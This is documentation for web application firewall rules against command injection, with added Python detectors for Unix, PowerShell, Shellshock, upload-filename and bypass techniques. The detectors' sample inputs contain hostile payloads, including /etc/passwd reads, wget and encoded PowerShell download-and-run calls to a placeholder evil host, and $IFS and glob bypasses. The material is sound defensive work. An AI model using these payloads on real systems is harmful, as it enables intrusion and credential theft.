Core Ruleset: 932xxx
Rules with the 932xxx prefix protect web applications from remote command execution (command injection) attacks.
Paranoia Level 1 (default)
Rule: 932100
This is a compound rule (932100, 932105 and 932106), with the sibling rules enabled according to the paranoia level. It blocks requests that contain anything that looks like a Unix command, so that an application which passes request data to a shell cannot be tricked into executing that command.
This rule matches against incoming cookies, parameters and URL strings.
Message: Remote Command Execution: Unix Command Injection
Example:
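The check described above, as an added illustration that is not code from the Core Rule Set or from this page: a small detector that walks the same request locations the rule inspects (URL path, query parameters, cookies and a form body) and looks for a Unix command name at the start of a value or right after a shell separator. The command list, the regular expression and the sample requests are all constructed for this example; the real rule compiles a generated list of several hundred command names, so this sketch both misses commands and says nothing about how CRS tunes false positives.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed, deliberately short list of Unix command names (the real
# rule uses a generated list of several hundred).
UNIX_COMMANDS = ("cat", "ls", "id", "wget", "curl", "nc", "sh", "bash", "python", "perl")

# A command name at the start of a value or right after a shell separator
# (; | & ` newline or "$("), optionally prefixed with /bin or /usr/bin, and
# followed by a word boundary so that "concatenate" is not read as "cat".
UNIX_COMMAND_RE = re.compile(
    r"(?:^|[;|&`\n]|\$\()\s*(?:/usr/bin/|/bin/)?(?:%s)\b"
    % "|".join(re.escape(c) for c in UNIX_COMMANDS),
    re.IGNORECASE,
)


def request_fields(method, target, headers, body=""):
    """Yield (location, name, value) for the path, query args, cookies and a form body."""
    parts = urlsplit(target)
    yield "REQUEST_URI", "", unquote(parts.path)
    for k, v in parse_qsl(parts.query, keep_blank_values=True):
        yield "ARGS", k, v
    for chunk in headers.get("Cookie", "").split(";"):
        name, sep, value = chunk.strip().partition("=")
        if sep:
            yield "REQUEST_COOKIES", name, unquote(value)
    if method == "POST" and headers.get("Content-Type", "").startswith(
        "application/x-www-form-urlencoded"
    ):
        for k, v in parse_qsl(body, keep_blank_values=True):
            yield "ARGS", k, v


def check_unix_command_injection(method, target, headers, body=""):
    """Return (location, name, matched text) for every field that looks like a Unix command."""
    findings = []
    for location, name, value in request_fields(method, target, headers, body):
        m = UNIX_COMMAND_RE.search(value)
        if m:
            findings.append((location, name, m.group(0).strip()))
    return findings


# Constructed sample requests: (method, target, headers, body). The ";" and
# "|" separators are percent-encoded so that older parse_qsl versions, which
# also split on ";", do not swallow them.
SAMPLES = {
    "benign": ("GET", "/search?q=concatenate+two+lists", {"Cookie": "session=abc123"}, ""),
    "query": ("GET", "/ping?host=127.0.0.1%3Bcat+/etc/passwd", {}, ""),
    "cookie": ("GET", "/", {"Cookie": "lang=en%7Cwget%20http://evil.example/x; theme=dark"}, ""),
    "body": ("POST", "/profile", {"Content-Type": "application/x-www-form-urlencoded"}, "name=x%60id%60"),
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print(label, check_unix_command_injection(*request))
```

The "benign" sample shows why the trailing word boundary matters: without it, "concatenate" would trip the "cat" entry. The "cookie" and "body" samples show that a detector limited to the query string would miss the same payload delivered in a cookie or in a POST body, which is why the rule covers all three locations.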
Rule: 932120
Protects against commonly used PowerShell commands, cmdlets and options that an attacker can use to gain elevated access to a system.
Message: Remote Command Execution: Windows PowerShell Command Found
Example:
Rule: 932130
Protects against common Unix shell expressions, such as those used for command substitution.
Applies: Cookies, cookie names, parameters and parameter names
Message: Remote Command Execution: Unix Shell Expression Found
Example:
Rule: 932140
Protects against FOR and IF commands for Windows systems.
Message: Remote Command Execution: Windows FOR/IF Command Found
Example:
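The two Windows checks above (932120 and 932140), as one added illustration that is not Core Rule Set code: a detector for cmd.exe FOR and IF forms and for a handful of PowerShell cmdlets and options. The token lists, the regular expressions and the sample values are constructed for this example. It also decodes a PowerShell -EncodedCommand argument (base64 of UTF-16LE text) and scans the decoded text, which is an extra step beyond what the rule descriptions on this page state, included because an encoded command hides the cmdlet names the rule looks for.

```python
import base64
import re

# Constructed, deliberately short token list; the CRS rule ships a far longer one.
POWERSHELL_TOKENS = (
    "invoke-expression", "iex", "invoke-webrequest", "iwr", "downloadstring",
    "start-process", "-encodedcommand", "-enc", "-executionpolicy", "bypass", "-nop",
)
# A token must not be glued to other word characters or hyphens, so "-enc" in
# "powershell -enc ..." matches but "-encoding" does not.
POWERSHELL_RE = re.compile(
    r"(?<![\w-])(?:%s)(?![\w-])" % "|".join(re.escape(t) for t in POWERSHELL_TOKENS),
    re.IGNORECASE,
)
# cmd.exe FOR with a switch, and IF with its keyword forms. The trailing \b
# keeps "for /forums" and "if existing" from matching.
CMD_FOR_IF_RE = re.compile(
    r"\b(?:for\s+/[fdlr]\b|if\s+(?:not\s+)?(?:exist|defined|errorlevel)\b)", re.IGNORECASE
)
# -e, -ec, -enc or -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(value):
    """Return the text behind an -EncodedCommand argument, or None if there is none."""
    m = ENCODED_RE.search(value)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_windows_command(value):
    """Return (category, matched text) pairs for a single request field value."""
    findings = [("FOR/IF", m.group(0)) for m in CMD_FOR_IF_RE.finditer(value)]
    findings += [("PowerShell", m.group(0)) for m in POWERSHELL_RE.finditer(value)]
    decoded = decode_encoded_command(value)
    if decoded is not None:
        findings += [("PowerShell(decoded)", m.group(0)) for m in POWERSHELL_RE.finditer(decoded)]
    return findings


# Constructed sample values. The encoded payload is built here rather than
# pasted so that it is verifiably the UTF-16LE/base64 form PowerShell expects.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://evil.example/p.ps1')".encode("utf-16le")
).decode()
SAMPLE_PS = "powershell -nop -w hidden -enc " + ENCODED_PAYLOAD
SAMPLE_FOR = 'for /f "tokens=*" %i in (\'dir\') do @echo %i'
SAMPLE_IF = r"if exist C:\Windows\win.ini echo yes"
BENIGN_FOR = "I was looking for /forums/help"
BENIGN_IF = "if existing customers complain"

if __name__ == "__main__":
    for sample in (SAMPLE_PS, SAMPLE_FOR, SAMPLE_IF, BENIGN_FOR, BENIGN_IF):
        print(check_windows_command(sample))
```

The two benign values are there to show the effect of the word boundaries: "for /forums" and "if existing" contain the same letters as the command forms but are ordinary text.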
Rule: 932160
Blocks request fields that contain common Unix shell command sequences.
Message: Remote Command Execution: Unix Shell Code Found
Example:
Rule: 932170
Detects and prevents exploitation of the “Shellshock” GNU Bash RCE vulnerability.
Message: Remote Command Execution: Shellshock (CVE-2014-6271)
Example:
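The Shellshock trigger, as an added illustration that is not Core Rule Set code: the vulnerable Bash versions ran the commands that followed a function definition ("() {" at the start of an environment variable's value), and CGI handlers copy request headers such as User-Agent into environment variables, so the check is anchored at the start of each header value and query argument. The pattern, the request parser and the sample requests are constructed for this example and are a simplification of what the rule matches.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Simplified Shellshock signature: a value that begins with an empty Bash
# function definition. Constructed for this example, not the CRS regex.
SHELLSHOCK_RE = re.compile(r"^\(\s*\)\s+\{")


def parse_request_head(raw):
    """Split a raw HTTP request head into (method, target, [(header, value), ...])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target = lines[0].split(" ")[:2]
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method, target, headers


def check_shellshock(raw):
    """Return (location, name) for every header or query argument that starts with "() {"."""
    method, target, headers = parse_request_head(raw)
    hits = [("REQUEST_HEADERS", name) for name, value in headers if SHELLSHOCK_RE.match(value)]
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if SHELLSHOCK_RE.match(value):
            hits.append(("ARGS", key))
    return hits


# Constructed sample requests (www.example.com and evil.example are placeholders).
SHELLSHOCK_UA = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd'\r\n"
    "Accept: */*\r\n\r\n"
)
# Same trigger in a query argument; ";" is encoded as %3B so parse_qsl keeps it.
SHELLSHOCK_ARG = (
    "GET /cgi-bin/status?name=()%20%7B%20:%3B%7D%3B%20id HTTP/1.1\r\n"
    "Host: www.example.com\r\n\r\n"
)
BENIGN = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/120.0\r\n\r\n"
)

if __name__ == "__main__":
    for raw in (SHELLSHOCK_UA, SHELLSHOCK_ARG, BENIGN):
        print(check_shellshock(raw))
```

Every header is checked, not only User-Agent, because a CGI environment exports all of them; a check limited to one header name would be bypassed by moving the payload to Referer or Cookie.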
Rule: 932180
Blocks uploads of files with restricted names. This stops an attacker from using a file upload form to place configuration files, or other files that change the behaviour of the web server, on the system, which could otherwise lead to remote code execution.
Message: Restricted File Upload Attempt
Example:
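The check described above, as an added illustration that is not Core Rule Set code: the filenames declared in a multipart/form-data body are extracted (ModSecurity exposes these as FILES and FILES_NAMES), reduced to a lower-case base name so that a directory prefix or a change of case does not hide them, and compared against a list of names that alter server behaviour. The list of restricted names, the boundary string and the sample body are constructed for this example; the real rule reads a longer data file.

```python
import email

# Constructed list of filenames whose presence changes server or application
# behaviour. The CRS rule ships a longer data file; these are common entries.
RESTRICTED_FILENAMES = {".htaccess", ".htpasswd", ".htdigest", "web.config", "php.ini", ".user.ini"}


def upload_filenames(content_type, body):
    """Return every filename declared in a multipart/form-data body (bytes), in order."""
    # The stdlib email parser understands any multipart/* message, so feeding it
    # the Content-Type header followed by the raw body yields the parts.
    msg = email.message_from_bytes(b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    return [part.get_filename() for part in msg.walk() if part.get_filename()]


def normalise_filename(name):
    """Reduce an attacker-controlled filename to a lower-case base name.

    Both separators are stripped, because a client may send "../.htaccess" or
    "..\\web.config", and the target may be a case-insensitive filesystem.
    """
    return name.replace("\\", "/").rsplit("/", 1)[-1].strip().lower()


def check_restricted_upload(content_type, body):
    """Return the declared filenames that resolve to a restricted name."""
    return [n for n in upload_filenames(content_type, body)
            if normalise_filename(n) in RESTRICTED_FILENAMES]


# Constructed sample request body with one benign and two restricted uploads.
BOUNDARY = "----ExampleBoundary7MA4YWxkTrZu0gW"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY


def build_multipart(parts):
    """Build a multipart/form-data body from (field, filename or None, content) tuples."""
    lines = []
    for field, filename, content in parts:
        lines.append("--" + BOUNDARY)
        disposition = 'Content-Disposition: form-data; name="%s"' % field
        if filename is not None:
            disposition += '; filename="%s"' % filename
        lines.append(disposition)
        if filename is not None:
            lines.append("Content-Type: application/octet-stream")
        lines.append("")
        lines.append(content)
    lines.append("--" + BOUNDARY + "--")
    return ("\r\n".join(lines) + "\r\n").encode()


SAMPLE_BODY = build_multipart([
    ("description", None, "profile picture"),
    ("file", "avatar.png", "PNGDATA"),
    ("file", "../../.htaccess", "AddType application/x-httpd-php .png"),
    ("file", "..\\..\\Web.Config", "<configuration/>"),
])

if __name__ == "__main__":
    print(upload_filenames(CONTENT_TYPE, SAMPLE_BODY))
    print(check_restricted_upload(CONTENT_TYPE, SAMPLE_BODY))
```

The declared filename is what the rule can see; the application must still generate its own storage name rather than trusting it, since the WAF check is a second line of defence and not a substitute for that.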
Rule: 932330
Detects attempts to invoke previously issued commands through Unix shell history expansion. A stricter sibling rule, which matches on more fields of the request, runs at paranoia level 3.
Message: Remote Command Execution: Unix shell history invocation
Example:
Paranoia Level 2
Rule: 932200
Blocks RCE bypass techniques, including uninitialised variables, string concatenation and globbing patterns.
Message: RCE Bypass Technique
Example:
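The three bypass techniques above, as an added illustration that is not Core Rule Set code: each one hides a command name from a plain word match, so the example first shows a naive check missing the payload, then normalises the value (unset variables expand to nothing, $IFS expands to whitespace, quotes used only to split a word are dropped) and runs the same check on the result, and flags a wildcard path directly because globbing cannot be resolved without the target filesystem. The command list, the regular expressions, the normalisation rules and the sample values are constructed for this example.

```python
import re

# Constructed short command list; the point of this example is the normalisation,
# not the list. The lookahead demands a separator after the name, so "cat$IFS"
# is not matched until $IFS has been expanded.
UNIX_COMMAND_RE = re.compile(r"(?:^|[;|&`\s])(?:cat|id|ls|nc|wget|curl)(?=$|[\s;|&`])")
IFS_RE = re.compile(r"\$(?:\{IFS\}|IFS)")              # $IFS expands to whitespace
VAR_RE = re.compile(r"\$(?:\{\w+\}|\w+|[@*])")          # assumed unset: expands to nothing
GLOB_PATH_RE = re.compile(r"(?:^|[\s;|&])/\S*[?*\[]\S*")  # a /path token containing a wildcard


def normalise(value):
    """Undo the bypass styles so a plain command check can run on the result.

    Assumptions (constructed for this example): every variable except IFS is unset,
    and quotes only serve to split a word, so they can be dropped.
    """
    value = IFS_RE.sub(" ", value)
    value = VAR_RE.sub("", value)
    return value.replace("'", "").replace('"', "")


def detect_bypass(value):
    """Return the bypass techniques present, or [] if the normalised value is harmless."""
    norm = normalise(value)
    if not (UNIX_COMMAND_RE.search(norm) or GLOB_PATH_RE.search(norm)):
        return []
    techniques = []
    if IFS_RE.search(value) or VAR_RE.search(value):
        techniques.append("uninitialised-variable")
    if "'" in value or '"' in value:
        techniques.append("concatenation")
    if GLOB_PATH_RE.search(norm):
        techniques.append("globbing")
    return techniques


# Constructed sample parameter values (evil.example is a placeholder host).
SAMPLES = {
    "braces": "c${u}at /e${u}tc/passwd",
    "ifs": "cat$IFS/etc/passwd",
    "quotes": "c'a't /etc/passwd",
    "glob": "/???/c?t /etc/passwd",
    "mixed": "w\"\"get$IFS'http://evil.example/x'",
    "benign": "it's a \"quoted\" note for $USER",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        naive = UNIX_COMMAND_RE.search(value) is not None
        print(label, "naive:", naive, "normalised:", repr(normalise(value)), detect_bypass(value))
```

The "benign" value contains quotes and a variable but no command after normalisation, so nothing is reported; quoting and variables are common in ordinary input, which is why a rule that reacts to them lives at paranoia level 2 rather than 1.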
Rule: 932210
Prevents SQLite CLI commands from being sent to the server.
Message: RCE Bypass Technique
Example:
Rule: 932300
Prevents SMTP command execution, using the list of SMTP commands defined in RFC 5321 (https://www.rfc-editor.org/rfc/rfc5321).
Message: Remote Command Execution: SMTP Command Execution
Example:
Rule: 932310
Prevents IMAP4 command execution, using the list of IMAP4 commands defined in RFC 3501, section 9 (https://datatracker.ietf.org/doc/html/rfc3501#section-9).
Message: Remote Command Execution: IMAP Command Execution
Example:
Rule: 932320
Prevents POP3 command execution, using the list of POP3 commands defined in RFC 1939, appendix B (https://www.rfc-editor.org/rfc/rfc1939#appendix-B).
Message: Remote Command Execution: POP3 Command Execution
Example:
Paranoia Level 3
This module does not define checks for paranoia level 3.
Paranoia Level 4
This module does not define checks for paranoia level 4.